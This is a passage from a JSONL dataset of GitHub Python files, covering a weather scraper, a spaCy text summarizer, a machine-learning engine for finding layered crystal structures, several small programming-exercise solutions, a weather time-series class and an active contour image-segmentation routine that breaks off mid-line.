\"h8\"})\r\n for i in range(len(post)):\r\n prec = post[i].text\r\n if len(re.findall('(\\d+)', prec)) != 0:\r\n prec_list.append(float(prec[41:-6]))\r\n else:\r\n prec_list.append(0.0)\r\n\r\n if leap_year and day == 59:\r\n average = [round(sum(temp_list) / len(temp_list), 1), round(sum(prec_list) / len(prec_list) * 10, 1)]\r\n elif leap_year and day == 60:\r\n day -= 1\r\n leap_year = False\r\n data.append(str(day) + ',' + str(round((round(sum(temp_list) / len(temp_list), 1) + average[0]) / 2, 1)) +\r\n ',' + str(round((round(sum(prec_list) / len(prec_list) * 10, 1) + average[1]) / 2, 1)))\r\n else:\r\n data.append(str(day) + ',' + str(round(sum(temp_list) / len(temp_list), 1)) +\r\n ',' + str(round(sum(prec_list) / len(prec_list) * 10, 1)))\r\n\r\n 
day += 1\r\n        date = date + datetime.timedelta(days=1)\r\n\r\n\r\n# Write the result to a file\r\ndf = pd.DataFrame(data=parse(URL_TEMPLATE, 2014))\r\ndf.to_csv(FILE_NAME, header=False, index=False)\r\n","repo_name":"cyber-dno/Negative-Selection-Algorithm-for-Weather-Analysing","sub_path":"WeatherParser_Gysmeteo.py","file_name":"WeatherParser_Gysmeteo.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40922905728","text":"from heapq import nlargest\nimport spacy\nfrom spacy import displacy\nfrom spacy.lang.en.stop_words import STOP_WORDS\nfrom string import punctuation\n\ntext = \"\"\"A programming language is a system of notation for writing computer programs.[1] Most programming languages are text-based formal languages, but they may also be graphical. They are a kind of computer language.\n\nThe description of a programming language is usually split into the two components of syntax (form) and semantics (meaning), which are usually defined by a formal language. Some languages are defined by a specification document (for example, the C programming language is specified by an ISO Standard) while other languages (such as Perl) have a dominant implementation that is treated as a reference. Some languages have both, with the basic language defined by a standard and extensions taken from the dominant implementation being common.\n\nProgramming language theory is the subfield of computer science that studies the design, implementation, analysis, characterization, and classification of programming languages.\"\"\"\n\ndef summarizer(rawdocs):\n    stopwords = list(STOP_WORDS)\n    # print(stopwords)\n\n    nlp = spacy.load('en_core_web_sm')\n    doc = nlp(rawdocs)\n    # print(doc)\n    entities = [{\"text\": ent.text, \"label\": ent.label_} for ent in doc.ents]\n\n    html = displacy.render(doc,style=\"ent\")\n\n    word_freq = {}\n    for word in doc :\n        if word.text.lower() not in stopwords and word.text.lower() not in punctuation:\n            if word.text not in word_freq.keys():\n                word_freq[word.text] = 1\n            else:\n                word_freq[word.text] += 1\n    \n    # print(word_freq)\n\n    max_freq = max(word_freq.values())\n    print(max_freq)\n\n    for word in word_freq.keys():\n        word_freq[word]=word_freq[word]/max_freq\n\n    # print(word_freq)\n\n    sent_tokens = [sent for sent in doc.sents]\n\n    # print(sent_tokens)\n\n    sent_scores = {}\n\n    for sent in sent_tokens:\n        for word in sent:\n            if word.text in word_freq.keys():\n                if sent not in sent_scores.keys():\n                    sent_scores[sent] = word_freq[word.text]\n                else:\n                    sent_scores[sent] += word_freq[word.text]\n\n    # print(sent_scores)\n    percent = 25;\n    percent = percent/100;\n    select_len = int(len(sent_tokens)*percent)\n    # print(select_len)\n\n    summary = nlargest(select_len , sent_scores , key = sent_scores.get)\n    # print(summary)\n\n    final_summary = [word.text for word in summary]\n    summary = ' '.join(final_summary)\n\n    # print(text)\n    # print(summary)\n\n    # print(\"Length of original text \" , len(text.split(' ')))\n    # print(\"Length of summary text \" , len(summary.split(' ')))\n    # orig_text = rawdocs\n    return summary , doc, len(rawdocs.split(' ')) , len(summary.split(' ')) , entities , html\n\n","repo_name":"rBhagat4196/NER-and-Text-Summarizer","sub_path":"text_summary.py","file_name":"text_summary.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"22707847976","text":"import json\nimport math\nimport time\n\nimport 
ase\nimport ase.io\nimport numpy as np\nimport shap\nimport spglib\n\n\nfrom ase import Atoms\nfrom ase.data import chemical_symbols\n\nfrom pymatgen.io.ase import AseAtomsAdaptor\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\n\nfrom .utils.structures import (\n ase_from_tuple,\n get_xsf_structure,\n tuple_from_ase,\n)\nfrom tools_barebone import get_tools_barebone_version\nfrom .utils.lowdimfinder import (\n LowDimFinder,\n _map_atomic_number_radii_van_der_Waals_alvarez,\n)\nfrom .utils.pointgroup import (\n pg_number_from_hm_symbol,\n prepare_pointgroup,\n prepare_spacegroup,\n SYMPREC,\n)\n\n###Featurization\nimport matminer\nfrom matminer.featurizers.base import MultipleFeaturizer\n\nfrom matminer.featurizers.structure import (\n SiteStatsFingerprint,\n ChemicalOrdering,\n MaximumPackingEfficiency,\n)\n\n### ML Model\nimport joblib\n\n# Version of this tool\n__version__ = \"21.11.0\"\n\n\ndef get_feature_name(pos): # pylint: disable=too-many-branches\n \"\"\"Return the name of the feature, given its index `pos`.\"\"\"\n\n local_env_prop_names = [\n \"Atomic number\",\n \"Mendeleev number\",\n \"Atomic weight\",\n \"Melting temperature\",\n \"Periodic table column\",\n \"Periodic table row\",\n \"Covalent radius\",\n \"Electronegativity\",\n \"Number of filled s valence orbitals\",\n \"Number of filled p valence orbitals\",\n \"Number of filled d valence orbitals\",\n \"Number of filled f valence orbitals\",\n \"Number of valence electrons\",\n \"Number of unfilled s valence orbitals\",\n \"Number of unfilled p valence orbitals\",\n \"Number of unfilled d valence orbitals\",\n \"Number of unfilled f valence orbitals\",\n \"Number of unfilled valence orbitals\",\n \"DFT volume per atom\",\n \"DFT band gap\",\n \"DFT magnetic moment\",\n \"Spacegroup number\",\n ]\n assert len(local_env_prop_names) == 22\n local_env_stats = [\"min\", \"max\", \"range\", \"mean\", \"mean abs deviation\"]\n assert len(local_env_stats) == 5\n\n if pos == 0:\n return \"Chemical ordering (first neighbors)\"\n if pos == 1:\n return \"Chemical ordering (second neighbors)\"\n if pos == 2:\n return \"Chemical ordering (third neighbors)\"\n if pos == 3:\n return \"Max packing efficiency\"\n # 4 above, 22*5 = 110 more, if the index is > 114 it's out of bounds\n if pos >= 114:\n raise ValueError(\"Only 114 features known\")\n\n idx = pos - 4\n prop_idx = idx % len(local_env_prop_names)\n stats_idx = idx // len(local_env_prop_names)\n return f\"{local_env_prop_names[prop_idx]} ({local_env_stats[stats_idx]})\"\n\n\ndef nice_print_rot(value, threshold=1.0e-4):\n \"\"\"\n Converts a float number to a LaTeX string, possibly converting \"common\" values (integers, and simple square roots)\n to nicer form.\n\n :param value: a float value\n :param threshold: a numerical threshold to decide if a number is an integer, a square root, ...\n :return: a (LaTeX) string\n \"\"\"\n int_value = int(round(value))\n\n if abs(int_value - value) < threshold:\n return f\"{int_value:d}\"\n if abs(value - 0.5) < threshold:\n return r\"\\frac{1}{2}\"\n if abs(value - (-0.5)) < threshold:\n return r\"-\\frac{1}{2}\"\n if abs(value - math.sqrt(2) / 2) < threshold:\n return r\"\\frac{\\sqrt{2}}{2}\"\n if abs(value - (-math.sqrt(2) / 2)) < threshold:\n return r\"-\\frac{\\sqrt{2}}{2}\"\n if abs(value - math.sqrt(3) / 2) < threshold:\n return r\"\\frac{\\sqrt{3}}{2}\"\n if abs(value - (-math.sqrt(3) / 2)) < threshold:\n return r\"-\\frac{\\sqrt{3}}{2}\"\n\n # As a fallback, return the float representation\n return 
f\"{value:10.5f}\"\n\n\ndef process_structure_core(\n structure, logger, flask_request\n): # pylint: disable=unused-argument, too-many-locals, too-many-statements, too-many-branches\n start_time = time.time()\n\n # Get information on the crystal structure to be shown later\n inputstructure_cell_vectors = [\n [idx, coords[0], coords[1], coords[2]]\n for idx, coords in enumerate(structure[0], start=1)\n ]\n inputstructure_symbols = [chemical_symbols[num] for num in structure[2]]\n inputstructure_atoms_scaled = [\n [label, coords[0], coords[1], coords[2]]\n for label, coords in zip(inputstructure_symbols, structure[1])\n ]\n\n inputstructure_positions_cartesian = np.dot(\n np.array(structure[1]),\n np.array(structure[0]),\n ).tolist()\n inputstructure_atoms_cartesian = [\n [label, coords[0], coords[1], coords[2]]\n for label, coords in zip(\n inputstructure_symbols, inputstructure_positions_cartesian\n )\n ]\n\n # prepare template dictionary to return later\n return_data = {\n \"app_data_json\": json.dumps(\n None\n ), # None by default, if e.g. layers are not found\n \"common_layers_search\": None, # None by default\n \"layers\": [], # Empty list if no layers found\n \"has_common_layers\": False,\n \"xsfstructure\": get_xsf_structure(structure),\n \"inputstructure_cell_vectors\": inputstructure_cell_vectors,\n \"inputstructure_atoms_scaled\": inputstructure_atoms_scaled,\n \"inputstructure_atoms_cartesian\": inputstructure_atoms_cartesian,\n \"ase_version\": ase.__version__,\n \"matminer_version\": matminer.__version__,\n \"joblib_version\": joblib.__version__,\n \"tools_barebone_version\": get_tools_barebone_version(),\n \"this_tool_version\": __version__,\n \"ML_predictions\": False,\n }\n\n asecell = ase_from_tuple(structure)\n\n # Get the primitive cell from the ase cell obtained from the user\n # NOTE! Beside getting the primitive cell, this function will also refine its symmetry.\n primitive_tuple = spglib.find_primitive(\n (\n asecell.get_cell(),\n asecell.get_scaled_positions(),\n asecell.get_atomic_numbers(),\n ),\n symprec=SYMPREC,\n )\n # Get now the conventional cell (it re-does a symmetry analysis)\n dataset = spglib.get_symmetry_dataset(primitive_tuple)\n conventional_tuple = (\n dataset[\"std_lattice\"],\n dataset[\"std_positions\"],\n dataset[\"std_types\"],\n )\n conventional_asecell = ase_from_tuple(conventional_tuple)\n\n bulk_spg = SpacegroupAnalyzer(\n AseAtomsAdaptor().get_structure(conventional_asecell), symprec=SYMPREC\n )\n pg_bulk_number = pg_number_from_hm_symbol(bulk_spg.get_point_group_symbol())\n return_data[\"pointgroup_bulk\"] = prepare_pointgroup(pg_bulk_number)\n return_data[\"spacegroup_bulk\"] = prepare_spacegroup(bulk_spg)\n\n # NOTE: there are cases in which it might not be detected - we'll deal with how to display those in the UI\n\n # From now on, I will work with the conventional cell rather than the one specified by the user\n # This is important because we sometimes (in the output) make assumptions that the number of layers found\n # is the number of layers in the conventional cell (e.g. 
when we say \"Multilayer spacegroup\n # for N >= {num_layers_conventional}\").\n\n ### MOHAMMAD: Run LowDimFinder\n for radiiOffset in [-0.75, -0.7, -0.65, -0.6, -0.55]:\n\n low_dim_finder = LowDimFinder(\n aiida_structure=conventional_asecell,\n vacuum_space=40.0,\n radii_offset=radiiOffset,\n bond_margin=0.0,\n max_supercell=3,\n min_supercell=3,\n rotation=True,\n full_periodicity=False,\n radii_source=\"alvarez\",\n orthogonal_axis_2D=True,\n )\n\n ### MOHAMMAD: Replace four variables (is_layered, layer_structures, layer_indices, rotated_asecell) with LowDimFinder Results!\n\n low_dim_finder_results = low_dim_finder.get_group_data()\n\n if 2 in low_dim_finder_results[\"dimensionality\"]:\n is_layered = True\n\n layer_structures = []\n layer_indices = []\n for i in range(len(low_dim_finder_results[\"dimensionality\"])):\n if low_dim_finder_results[\"dimensionality\"][i] == 2:\n struc = Atoms(\n symbols=low_dim_finder_results[\"chemical_symbols\"][i],\n positions=low_dim_finder_results[\"positions\"][i],\n cell=low_dim_finder_results[\"cell\"][i],\n tags=low_dim_finder_results[\"tags\"][i],\n )\n layer_structures.append(struc)\n layer_indices.append(\n low_dim_finder._get_unit_cell_groups()[ # pylint: disable=protected-access\n i\n ]\n )\n rotated_asecell = low_dim_finder._rotated_structures[ # pylint: disable=protected-access\n i\n ]\n break\n if radiiOffset == -0.55:\n is_layered = False\n layer_indices = None\n layer_structures = None\n rotated_asecell = None\n\n ### MOHAMMAD: Just to be consistant with before and avoid further changes!\n ### MOHAMMAD: layer_indices must be smaller than the number of elements in a unitcell!\n ### MOHAMMAD: For example, change: layer_indices of [[0, 4, 8, 11, 15, 19, 20, 75, 79, 84, 88, 95],\n ### MOHAMMAD: [1, 2, 5, 6, 9, 10, 13, 14, 17, 18, 21, 22]] to [[0, 4, 8, 11, 15, 19, 20, 3, 7, 12, 16, 23],\n ### MOHAMMAD: [1, 2, 5, 6, 9, 10, 13, 14, 17, 18, 21, 22]] -- In this case the number of element is 24!\n\n ### MOHAMMAD: More efficient way:\n\n if is_layered:\n for i in range(len(layer_indices)): # pylint: disable=consider-using-enumerate\n for j in range(len(layer_indices[i])):\n if layer_indices[i][j] >= len(conventional_asecell):\n tmp = layer_indices[i][j]\n layer_indices[i][j] = tmp % len(conventional_asecell)\n\n ### MOHAMMAD: replace all the components and commented!\n\n # Get the scaled radii for the bonds detection\n\n ### MOHAMMAD: Used vdW radii in order to draw bonds by visualizer\n\n scaled_radii_per_site = np.array(\n [\n _map_atomic_number_radii_van_der_Waals_alvarez.get(atom.number)\n for atom in asecell\n ]\n )\n\n # This is a dict of the form {\"Na\": 1.3, \"C\": 1.5}, ..\n scaled_radii_per_kind = {\n atom.symbol: scaled_radius\n for atom, scaled_radius in zip(asecell, scaled_radii_per_site)\n }\n\n # I now construct the list of *pairwise* threshold distances, to be passed to JSMOL\n # In theory, I could use simply \"set bondTolerance 0;\" and \"{_P}.bondingRadius = 1.4158\" (in this example, for\n # the P element). 
However, it does not seem to be setting the threshold for showing a bond at the sum,\n # but at some different value.\n # Therefore, I instead compute the pairwise threshold distance, say for elements Ga and As, and pass the following\n # JSMOL string (if, say, I don't want bonds for atoms closer than 0.2 ang, and the threshold distance is 2.27 ang):\n # \"connect 0.2 2.27 {_Ga} {_As};\"\n # It is good to prepend this with \"set autobond off;\" before loading, or use first a \"connect delete;\" to remove\n # existing bonds\n\n ### MOHAMMAD: Add offset to the vdw radii\n\n jsmol_bond_commands = []\n min_bonding_distance = 0.2 # ang\n for kind1, radius1 in scaled_radii_per_kind.items():\n for kind2, radius2 in scaled_radii_per_kind.items():\n if kind1 > kind2:\n # Just do one of the two pairs\n continue\n jsmol_bond_commands.append(\n f\"connect {min_bonding_distance} {radius1+radius2+2*radiiOffset} {{_{kind1}}} {{_{kind2}}}; \"\n )\n\n # Encode as JSON string before sending, so it's safe to inject in the code\n return_data[\"jsmol_bond_command\"] = json.dumps(\"\".join(jsmol_bond_commands))\n\n if not is_layered:\n # I return here; some sections will not be present in the output so they will not be shown.\n compute_time = time.time() - start_time\n return_data[\"compute_time\"] = compute_time\n logger.debug(json.dumps(return_data, indent=2, sort_keys=True))\n return return_data\n\n layer_xsfs = [\n get_xsf_structure(tuple_from_ase(layer_structure))\n for layer_structure in layer_structures\n ]\n\n return_data[\"layers\"] = list(\n zip(\n layer_xsfs,\n # Needed because this might return int64 numpy objects, not JSON-serializable\n [\n [int(index) for index in this_layer_indices]\n for this_layer_indices in layer_indices\n ],\n )\n )\n\n # This is returned both in the return_data, for the HTML view, and in the app data,\n # to be set as a minimum for the REST API requests\n num_layers_bulk = len(layer_indices)\n return_data[\"num_layers_bulk\"] = num_layers_bulk\n\n return_data[\"rotated_cell\"] = {\n \"layer_cell\": rotated_asecell.cell.tolist(),\n \"layer_atoms\": [\n list(\n zip(\n rotated_asecell[this_layer_indices].symbols,\n rotated_asecell[this_layer_indices].positions.tolist(),\n )\n )\n for this_layer_indices in layer_indices\n ],\n }\n\n ### MOHAMMAD: Here we generate features for the strucutres that passed the LowDimFinder\n\n featurizer = MultipleFeaturizer(\n [\n ChemicalOrdering(),\n MaximumPackingEfficiency(),\n SiteStatsFingerprint.from_preset(\"LocalPropertyDifference_ward-prb-2017\"),\n ]\n )\n\n structures_pg = AseAtomsAdaptor.get_structure(conventional_asecell)\n\n list_structures = {}\n list_structures[\"structure\"] = structures_pg\n\n print(structures_pg)\n X = featurizer.featurize_many([structures_pg], ignore_errors=True)\n print(X)\n\n ### MOHAMMAD: Load the trained model\n\n loaded_RF = joblib.load(\n \"/home/app/code/webservice/static/random_forest_model.joblib\"\n )\n explainer = shap.Explainer(loaded_RF)\n\n ### MOHAMMAD: make prediction!\n pred_RF = loaded_RF.predict(X)\n if pred_RF == [1]:\n return_data[\"ML_predictions\"] = True\n else:\n return_data[\"ML_predictions\"] = False\n\n # Also get the SHAP values\n shap_explanation = explainer(np.array(X))\n # This is now an array of the |shap|\n abs_shap_values = np.abs(shap_explanation[0, :, 1].values)\n\n MAX_DISPLAY = 20\n sorted_shaps = sorted(list(zip(abs_shap_values, range(len(abs_shap_values)))))[::-1]\n\n sorted_shap_with_feature_name = []\n for idx in range(MAX_DISPLAY):\n abs_shap, feature_pos = 
sorted_shaps[idx]\n sorted_shap_with_feature_name.append([get_feature_name(feature_pos), abs_shap])\n sorted_shap_with_feature_name.append(\n [\n f\"Sum of {len(sorted_shaps) - MAX_DISPLAY} other features\",\n sum(shap[0] for shap in sorted_shaps[MAX_DISPLAY:]),\n ]\n )\n return_data[\"sorted_abs_shaps\"] = sorted_shap_with_feature_name\n\n # I return here; some sections will not be present in the output so they will not be shown.\n compute_time = time.time() - start_time\n return_data[\"compute_time\"] = compute_time\n logger.debug(json.dumps(return_data, indent=2, sort_keys=True))\n return return_data\n","repo_name":"epfl-theos/tool-ml-layer-finder","sub_path":"compute/ml_layer_finder_engine.py","file_name":"ml_layer_finder_engine.py","file_ext":"py","file_size_in_byte":15374,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"41583031906","text":"IN = input()\n\nline = IN.split(' ')\n\nn1 = float(line[0])\nn2 = float(line[1])\nn3 = float(line[2])\nn4 = float(line[3])\n\nmedia=((n1*2)+(n2*3)+(n3*4)+(n4*1) )/10\nprint(\"Media: %.1f\"%media)\n\nif(media >= 7.0):\n print(\"Aluno aprovado.\")\nelif(media <5.0):\n print(\"Aluno reprovado.\")\nelif(media >=5.0 and media <=6.9):\n print(\"Aluno em exame.\")\n ex_num = float(input())\n print(\"Nota do exame: %.1f\"%ex_num)\n final_num=(media+ex_num)/2\n if(final_num >= 5.0):\n print(\"Aluno aprovado.\")\n else:\n print(\"Aluno reprovado.\")\n print(\"Media final: %.1f\"%final_num)\n \n \n","repo_name":"AKmahim/URI-solution-in-python","sub_path":"uri1040py.py","file_name":"uri1040py.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36843310998","text":"class Solution:\n def numOfSubarrays(self, arr):\n n = len(arr)\n evens, odds = [0] * n, [0] * n\n evens[0] += not arr[0] % 2\n odds[0] += arr[0] % 2\n for i in range(1, n):\n evens[i] = odds[i - 1] if arr[i] % 2 else 1 + evens[i - 1]\n odds[i] = 1 + evens[i - 1] if arr[i] % 2 else odds[i - 1]\n return sum(odds) % (10**9 + 7)\n","repo_name":"simonesestili/problems-dsa","sub_path":"1524.py","file_name":"1524.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19624351911","text":"#%%\nfrom __future__ import annotations\n\nfrom dataclasses import asdict, dataclass, field\nfrom datetime import datetime as dt\nfrom typing import Dict, Optional, TypedDict\n\nfrom api.src.classes.WeatherInformation import WeatherInformation\nfrom api.src.utils.enums import delta_time, time_limit\nfrom api.src.utils.functions import date_calc\nfrom api.src.utils.logger import logger\n\nPartialWeatherInformation = TypedDict(\n 'HeterogeneousDictionary',\n {\n 'timestamp': str,\n 'end_date': str,\n 'lon': float,\n 'lat': float,\n 'dataseries': WeatherInformation,\n },\n)\n\n\n@dataclass\nclass WeatherTimeSeries:\n \"\"\"A class used to represent a set of information retrieved from external\n endpoint\n\n Attributes\n ----------\n\n start_date: (str):a string representing a utc time in isoformat at the\n moment of processing\n\n end_date (string): a string representing a calculated utc time in isoformat\n\n lon (float): a float representation of a given Longitude\n\n lat (float): a float representation of a given Latitude\n\n timeseries (list[WeatherInformation]): an object that represents a time\n series and its encapsuled information\n\n Methods\n -------\n\n 
calc_timeseries(self, dataseries: list, now: str, time_limit: int = time_limit,\n date_calc: str = date_calc, ) -> WeatherTimeSeries:\n Update the attribute dataseries\n\n\n to_json(self) -> Dict[str, any]:\n Method to return the instantiated object as a dict\n \"\"\"\n\n start_date: str\n end_date: str\n lon: float\n lat: float\n timeseries: Optional[list[WeatherInformation]] = None\n\n def calc_timeseries(\n self,\n dataseries: list,\n now: str,\n time_limit: int = time_limit,\n date_calc: str = date_calc,\n ) -> WeatherTimeSeries:\n \"\"\"Update the attribute dataseries\n\n Given a received data series from external endpoint partially\n instantiated and then, updates this object with open_sky attribute\n\n Args:\n time_limit (int): an int representing a maximum of objects in data\n series calculated by rounding the quotient of delta_time by time_frame\n dataseries (list): _description_\n now (dt): _description_\n date_calc (dt, optional): _description_. Defaults to date_calc.\n\n Returns:\n WeatherTimeSeries: An instantiated object of the class WeatherTimeSeries\n \"\"\"\n result = list()\n logger.debug(dataseries)\n for data in dataseries[:time_limit]:\n constructor = {\n 'utc_timestamp': date_calc(now, data.get('timepoint')),\n 'cloud_cover': data.get('cloudcover'),\n 'temperature': data.get('temp2m'),\n }\n result.append(WeatherInformation.get_open_sky(constructor))\n self.timeseries = result\n for weather in self.timeseries:\n weather.solar_calc()\n return self\n\n def to_json(self) -> Dict[str, any]:\n \"\"\"Method to return the instantiated object as a dict\n\n Return the fields of a dataclass instance as a new dictionary mapping\n field names to field values.\n\n\n Returns:\n Dict[str, any]: Returns a dict to be converted to json with the\n attributes from class as keys and their value\n \"\"\"\n return asdict(self)\n\n @classmethod\n def get(\n cls,\n lon: float,\n lat: float,\n now: dt = dt.utcnow(),\n date_calc: str = date_calc,\n delta: int = delta_time,\n ) -> WeatherTimeSeries:\n \"\"\"class Method to construct the class\n\n Given a latitude longitude coordinate, an timestamp this method will\n calculate the end date of the time series passing the lon and lat to\n class attributes not initializing the timeseries attribute.\n\n Args:\n lon (float): an float representing a valid longitude\n lat (float): an float representing a valid latitude\n now (datetime, optional): Object of class datetime in utc. Defaults\n to utc at the time of processing.\n date_calc (function, optional): Pass the function date_calc as an\n dependency injection. Defaults to date_calc.\n delta (int, optional): the maximum hours to be calculate restricted\n by 168 as it is the limit of the api. 
Defaults to 48.\n\n Returns:\n WeatherTimeSeries: A partially instantiated object of the class\n WeatherTimeSeries\n \"\"\"\n constructor = {\n 'start_date': now.isoformat(),\n 'end_date': date_calc(now, delta),\n 'lon': lon,\n 'lat': lat,\n }\n\n return cls(**constructor)\n\n\n# %%\n","repo_name":"Ostrock/api","sub_path":"api/src/classes/WeatherTimeseries.py","file_name":"WeatherTimeseries.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"953616229","text":"import math\n\nfrom solution_56 import digit_sum\n\n\ndef sqrt_digits(number: int) -> str:\n number *= 10**250\n root = number\n for i in range(100000):\n old = root\n root = (root + number // root) // 2\n if old == root:\n break\n return str(root)\n\n\ndef solution() -> int:\n result = 0\n for i in range(100):\n if math.floor(math.sqrt(i)) ** 2 != i:\n result += digit_sum(sqrt_digits(i)[:100])\n return result\n\n\nif __name__ == \"__main__\":\n import runner\n\n runner.run(globals())\n","repo_name":"martin-ueding/project-euler-solutions","sub_path":"solution_80.py","file_name":"solution_80.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"71156092846","text":"import numpy as np\nfrom scipy.interpolate import RectBivariateSpline\nfrom skimage.filters import sobel\nfrom skimage import img_as_float\nfrom scipy import ndimage as ndi\nfrom itertools import cycle\nfrom skimage.draw import polygon\n\n\ndef active_contour(image, snake, alpha=0.01, beta=0.1,\n w_line=0, w_edge=1, gamma=0.01,\n max_px_move=1.0,\n max_num_iter=2500, convergence=0.1,\n *,\n boundary_condition='periodic'):\n \"\"\"Active contour model.\n Active contours by fitting snakes to features of images. Supports single\n and multichannel 2D images. Snakes can be periodic (for segmentation) or\n have fixed and/or free ends.\n The output snake has the same length as the input boundary.\n As the number of points is constant, make sure that the initial snake\n has enough points to capture the details of the final contour.\n Parameters\n ----------\n image : (N, M) or (N, M, 3) ndarray\n Input image.\n snake : (N, 2) ndarray\n Initial snake coordinates. For periodic boundary conditions, endpoints\n must not be duplicated.\n alpha : float, optional\n Snake length shape parameter. Higher values makes snake contract\n faster.\n beta : float, optional\n Snake smoothness shape parameter. Higher values makes snake smoother.\n w_line : float, optional\n Controls attraction to brightness. Use negative values to attract\n toward dark regions.\n w_edge : float, optional\n Controls attraction to edges. Use negative values to repel snake from\n edges.\n gamma : float, optional\n Explicit time stepping parameter.\n max_px_move : float, optional\n Maximum pixel distance to move per iteration.\n max_num_iter : int, optional\n Maximum iterations to optimize snake shape.\n convergence : float, optional\n Convergence criteria.\n boundary_condition : string, optional\n Boundary conditions for the contour. Can be one of 'periodic',\n 'free', 'fixed', 'free-fixed', or 'fixed-free'. 'periodic' attaches\n the two ends of the snake, 'fixed' holds the end-points in place,\n and 'free' allows free movement of the ends. 'fixed' and 'free' can\n be combined by parsing 'fixed-free', 'free-fixed'. 
Parsing\n    'fixed-fixed' or 'free-free' yields same behaviour as 'fixed' and\n    'free', respectively.\n    Returns\n    -------\n    snake : (N, 2) ndarray\n        Optimised snake, same shape as input parameter.\n    References\n    ----------\n    .. [1] Kass, M.; Witkin, A.; Terzopoulos, D. \"Snakes: Active contour\n            models\". International Journal of Computer Vision 1 (4): 321\n            (1988). :DOI:`10.1007/BF00133570`\n\n    \"\"\"\n    max_num_iter = int(max_num_iter)\n    if max_num_iter <= 0:\n        raise ValueError(\"max_num_iter should be >0.\")\n    convergence_order = 10\n    valid_bcs = ['periodic', 'free', 'fixed', 'free-fixed',\n                 'fixed-free', 'fixed-fixed', 'free-free']\n    if boundary_condition not in valid_bcs:\n        raise ValueError(\"Invalid boundary condition.\\n\" +\n                         \"Should be one of: \"+\", \".join(valid_bcs)+'.')\n\n    img = img_as_float(image)\n    img = img.astype(float, copy=False)\n\n    # Find edges using sobel (a 2D grayscale image gets a single edge map,\n    # a multichannel image gets one per channel):\n    if img.ndim == 2:\n        if w_edge != 0:\n            edge = [sobel(img)]\n        else:\n            edge = [0]\n    elif w_edge != 0:\n        edge_new = [sobel(c) for c in np.moveaxis(img, -1, 0)]\n        edge = np.stack(edge_new, axis=-1)\n    else:\n        edge = [0]\n\n    # Superimpose intensity and edge images:\n    if img.ndim == 3:\n        img = w_line*np.sum(img, axis=2) \\\n            + w_edge*np.sum(edge, axis=-1)\n    else:\n        img = w_line*img + w_edge*edge[0]\n\n    # Interpolate for smoothness:\n    intp = RectBivariateSpline(np.arange(img.shape[1]),\n                               np.arange(img.shape[0]),\n                               img.T, kx=2, ky=2, s=0)\n\n    snake_xy = snake[:, ::-1]\n    x = snake_xy[:, 0].astype(float)\n    y = snake_xy[:, 1].astype(float)\n    n = len(x)\n    xsave = np.empty((convergence_order, n), dtype=float)\n    ysave = np.empty((convergence_order, n), dtype=float)\n\n    # Build snake shape matrix for Euler equation in double precision\n    eye_n = np.eye(n, dtype=float)\n    a = (np.roll(eye_n, -1, axis=0)\n         + np.roll(eye_n, -1, axis=1)\n         - 2 * eye_n)  # second order derivative, central difference\n    b = (np.roll(eye_n, -2, axis=0)\n         + np.roll(eye_n, -2, axis=1)\n         - 4 * np.roll(eye_n, -1, axis=0)\n         - 4 * np.roll(eye_n, -1, axis=1)\n         + 6 * eye_n)  # fourth order derivative, central difference\n    A = -alpha * a + beta * b\n\n    # Impose boundary conditions different from periodic:\n    sfixed = False\n    if boundary_condition.startswith('fixed'):\n        A[0, :] = 0\n        A[1, :] = 0\n        A[1, :3] = [1, -2, 1]\n        sfixed = True\n    efixed = False\n    if boundary_condition.endswith('fixed'):\n        A[-1, :] = 0\n        A[-2, :] = 0\n        A[-2, -3:] = [1, -2, 1]\n        efixed = True\n    sfree = False\n    if boundary_condition.startswith('free'):\n        A[0, :] = 0\n        A[0, :3] = [1, -2, 1]\n        A[1, :] = 0\n        A[1, :4] = [-1, 3, -3, 1]\n        sfree = True\n    efree = False\n    if boundary_condition.endswith('free'):\n        A[-1, :] = 0\n        A[-1, -3:] = [1, -2, 1]\n        A[-2, :] = 0\n        A[-2, -4:] = [-1, 3, -3, 1]\n        efree = True\n\n    # Only one inversion is needed for implicit spline energy minimization:\n    inv = np.linalg.inv(A + gamma * eye_n)\n    # can use float_dtype once we have computed the inverse in double precision\n    inv = inv.astype(float, copy=False)\n\n    # Explicit time stepping for image energy minimization:\n    for i in range(max_num_iter):\n        # RectBivariateSpline always returns float64, so call astype here\n        fx = intp(x, y, dx=1, grid=False).astype(float, copy=False)\n        fy = intp(x, y, dy=1, grid=False).astype(float, copy=False)\n\n        if sfixed:\n            fx[0] = 0\n            fy[0] = 0\n        if efixed:\n            fx[-1] = 0\n            fy[-1] = 0\n        if sfree:\n            fx[0] *= 2\n            fy[0] *= 2\n        if efree:\n            fx[-1] *= 2\n            fy[-1] *= 2\n        xn = inv @ (gamma*x + fx)\n        yn = inv @ (gamma*y + fy)\n\n        # Movements are capped to max_px_move per iteration:\n        dx = max_px_move * np.tanh(xn - x)\n        dy = max_px_move * np.tanh(yn - 
